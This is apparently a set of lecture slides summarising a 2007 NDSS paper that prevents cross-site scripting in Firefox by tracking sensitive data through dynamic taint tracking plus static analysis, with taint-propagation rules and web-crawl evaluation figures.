Cross-Site Scripting Prevention with Dynamic Tainting and Static Analy-sis

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic,Engin Kirda, Christopher Kruegel, and Giovanni VignaNetwork and Distributed System Security(NDSS ‘07)

1 / 18

Authors

Philipp Vogt Main developer of the XSS

Attack Prevention in Firefox project

Cross site scripting detec-tion

Giovanni Vigna Associate Professor of UCSB Web Security, Intrusion De-

tection2 / 18

Introduction[1/5]

Cross Site Scripting An attack against web applications

where malicious scripting code is in-jected into the output of an application that is further delivered to a user’s web browser

This scripting code transfers sensitive in-formation to the attacker

This information allows the attacker to impersonate the victim or hijack the vic-tim’s session

3 / 18

Introduction[2/5]

Cross Site Scripting

Attacker

Server

Victim

Send to email with XSS code

Send to request with XSS Code

Send to response with XSS Code

XSS Code is executed

Sensitive information is trasfered

4 / 18

Introduction[3/5]

Stored XSS Attacker persistently stores the malicious code in a resource managed by the web application, such as a database. when the victim requests a dynamic page, The actual attack is carried out at a later time.

Reflected XSS The attack script is not persistently stored, instead, it is reflected(sent back) to the victim. Example

Sending to the victim an email with a link that contains the malicious JavaScript code.

5 / 18

Introduction[4/5]

Sensitive Data Sources

6 / 18

Introduction[5/5]

The Goal JavaScript program can send sensitive in-formation only to the site from which it was loaded So the information flow of sensitive data is tracked inside the JavaScript engine of the browser. Whenever an attack is detected, the user is warned and given the possibility to stop the trans-fer.

7 / 18

Dynamic Tainting[1/5]

Dynamic Tainting Sensitive data is first marked, and then, when this data is accessed by scripts run-ning in the web browser, its use is dynami-cally tracked by system. it is sufficient to model the taint value associ-ated with a piece of data as a simple boolean flag.

8 / 18

Dynamic Tainting[2/5]

Taint Propagation Assignments Arithmetic and logic operations (+, -, &, etc.) Control structures and loops (if, while, switch,

for in) Function call and eval

9 / 18

Static Tainting[1/3]

Indirect Control Dependency

To cover both direct and indirect control dependen-cies, all possible program path in a scope need to be examined.Static analysis is necessary.

10 / 18

Static Tainting[2/3]

Linear Static Taint AnalysisEnsure all variables that are assigned val-ues (tainted or not) inside the tainted scope are also tainted.

11 / 18

Static Tainting[3/3]

Stack Analysis

Instructions responsible for setting object properties do not specify the target object because of stack-based nature of JavaScript.

Abstraction stack which has boolean values.

12 / 18

Data Transmission

The tainted data has to be trans-ferred to a third party, using a variety of meth-ods. document.location. source of an image in the web page. Submitting a form in the web page. XMLHttpRequest object.

13 / 18

Evaluation[1/4]

XSS attacks XSS sources that group’s members collected Successful in detecting XSS

Manual test The modified browser was used by the au-

thors for web surfing on a daily basis The overhead of is negligible. The amount of false positives was low.

14 / 18

Evaluation[2/4]

Automatic test Integrate a web crawling engine into modi-

fied Firefox. Visited 1,033,000 unique web pages 88,589 (8.58%) web pages raised an XSS

warning The scripts are inserted into the web page

with the consent of the web site owner.

15 / 18

Evaluation[3/4]

Top -30 destination domain These domains belong to

companies that collectstatistics about traffic on web sites of their customers

Deny top 30 domains, reduce to 13,964(1.35%)

Reduced to 5,289 (0.51%) if only transfer of cookies were considered

16 / 18

Evaluation[4/4]

Reasons of small false positives Transfer of cookies to different domains,

but within company borders (eg. cnn.net -> cnn.com)

Transfer of cookies between different domains, but same company (eg. dis-cover.com -> unitedstreaming.com)

Our indirect control flow

17 / 18

Conclusion

Prevent XSS attacks using a dynamic taint analysis and static analysis when neces-sary.

Integrate the solution into Firefox web browser by modifying its JavaScript en-gine.

Generate small false positives and feasible in practice.

18 / 18

19

Extra - Dynamic Tainting[3/5]

Assignments If the right-hand side of the assignment is tainted,

then the target on the left-hand side is also tainted. x = document.cookie;

The variable that is assigned a tainted value is not the only object that must be tainted.

Arithmetic and Logic Operation Javascript is a stack-based language. First pop the operands from the stack and then push back

the result. The result is tainted if one of the used operands is

tainted.

20

Extra - Dynamic Tainting[4/5]

Control Structures and Loops if the condition of a control structure tests a tainted value, a tainted scope is generated that covers the whole control structures. A variable is dynamically tainted only when its value is modi-fied inside a scope during the actual execution of the program

Function Calls If a function is defined in a tainted scope, the function itself (op-erations, parameters, return value) is also tainted

Eval If eval is called in a tainted scope or if its parameter is tainted, a scope is generated.

21

Extra - Dynamic Tainting[5/5]

Example

22

Extra - Implementation

Extends Mozilla firefox 1.o pre Two parts for containing tainted data objects

The javascript engine (Spider-Monkey) Variable, functions, scopes, and objects

DOM tree location.href, etc

Every time a JavaScript program attempts to transfer sensitive data, a check is performed to determine whether sensitive data is sent to own host